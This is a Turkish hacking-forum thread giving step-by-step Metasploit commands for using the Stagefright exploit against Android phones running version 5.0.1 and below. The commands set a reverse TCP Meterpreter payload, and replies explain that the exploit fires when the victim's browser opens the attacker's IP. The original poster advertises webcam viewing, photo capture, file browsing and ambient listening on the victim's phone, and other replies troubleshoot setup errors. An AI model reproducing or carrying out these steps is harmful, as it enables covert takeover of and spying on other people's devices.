Android Hacking Stagefright

kolboy

kolboy

Katılımcı Üye
15 Ağu 2008
586
3
SelamAleykum Arkadaslar

Metesploite yeni modul geldi herkes mp4.py yani stagefright exploitini yapmaya calisirken yapamadi ama m.e.t.a.sploit buni sizin icin kolaylastirdi.

Kali aciyoruz consola
Kod: 
apt-get update
Kod: 
msfupdate
Kod: 
msfconsole
Kod: 
use exploit/android/browser/stagefright_mp4_tx3g_64bit
Kod: 
show options
Hersey tamam simdi ayarlari gorucez bunlari kendi LAN aginiza gore duzunliyeceksiniz.
Burda payload ekliyecez.
Kod: 
Slset PAYLOAD linux/armle/mettle/reverse_tcp
Ayarlari tekrar duzenliyip exploit edecez
Kod: 
show options
Kod: 
exploit

Yapamiyanlar icin video
https://youtu.be/dAZ4W6OkkRk

Not: Direk olarak meterpreter aciliyor ve help komutu ile neler yapacaginiza bakarsiniz. IYI forumlar
 
kolboy

kolboy

Katılımcı Üye
15 Ağu 2008
586
3
//Güncel

NOT: Android 5.0.1 ve alt sürümlerde işe yarıyor direk olarak meterpreter açılyor
 
kolboy

kolboy

Katılımcı Üye
15 Ağu 2008
586
3
Help komutunu kullanarak herseyi yapabalirisn

Webcam gorme resim cekme dosyalari gorme ortam dinlemesi vb.
 
rootsuz

rootsuz

Kıdemli Üye
10 Ağu 2015
3,482
0
kolboy' Alıntı:
SelamAleykum Arkadaslar

Metesploite yeni modul geldi herkes mp4.py yani stagefright exploitini yapmaya calisirken yapamadi ama m.e.t.a.sploit buni sizin icin kolaylastirdi.

Kali aciyoruz consola
Kod: 
apt-get update
Kod: 
msfupdate
Kod: 
msfconsole
Kod: 
use exploit/android/browser/stagefright_mp4_tx3g_64bit
Kod: 
show options
Hersey tamam simdi ayarlari gorucez bunlari kendi LAN aginiza gore duzunliyeceksiniz.
Burda payload ekliyecez.
Kod: 
Slset PAYLOAD linux/armle/mettle/reverse_tcp
Ayarlari tekrar duzenliyip exploit edecez
Kod: 
show options
Kod: 
exploit

Yapamiyanlar icin video
https://youtu.be/dAZ4W6OkkRk

Not: Direk olarak meterpreter aciliyor ve help komutu ile neler yapacaginiza bakarsiniz. IYI forumlar
Genişletmek için tıkla ...

Eline sağlık
 
BORNSCORER

BORNSCORER

Üye
8 Eyl 2016
105
0
msfconsole yazınca en son fron /usr/bin/msfconsole:48 in '<main>' çıkıyor ne yapmam lazım
 
B

Blue Hacker

Üye
10 Ara 2009
244
0
bu sadece nexus ve galaxy s5 android 5.0.1 sürümünde çalışmaktadır kaldıki bu açığı güvenlik güncellemesiyle kapattılar.
 
kolboy

kolboy

Katılımcı Üye
15 Ağu 2008
586
3
BORNSCORER' Alıntı:
msfconsole yazınca en son fron /usr/bin/msfconsole:48 in '<main>' çıkıyor ne yapmam lazım
Genişletmek için tıkla ...
apt-get update
apt-get upgrade
apt-get dist-upgrade
msfupdate

Blue Hacker' Alıntı:
bu sadece nexus ve galaxy s5 android 5.0.1 sürümünde çalışmaktadır kaldıki bu açığı güvenlik güncellemesiyle kapattılar.
Genişletmek için tıkla ...
Bir çok telefondo çalışıyor kardeşim dene gör 5.0.1 ve alt sürümlerinde notumdada belirttim

 
trl27

trl27

Yeni üye
8 Nis 2012
15
0
Paket listeleri okunuyor... Bitti
W: GPG hatası: Index of / kali-rolling InRelease: Aşağıdaki imzalar doğrulanamadı, çünkü genel anahtar mevcut değil: NO_PUBKEY ED444FF07D8D0BF6
root@TrlBkmzci:/home/trlbkmzci# msfupdate
bash: msfupdate: komut yok[
Genişletmek için tıkla ...
selamun aleykum abi bu hatayı alıyorum ne yapmam gerekiyor
 
trl27

trl27

Yeni üye
8 Nis 2012
15
0
kolboy' Alıntı:
Buyuk ihtimalle linuxu duzgun kurmadim bastan kurup yapmani oneririm.


hayir kardesim ikiside degil orada yazdigin kendi ip'ni telefonun tarayicisana yazdigin anda kodlar calisiyor ve sizma islemi gerceklesiyor.
Genişletmek için tıkla ...
Teşekkürler kardeşim verdiğin bilgi için🙂
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.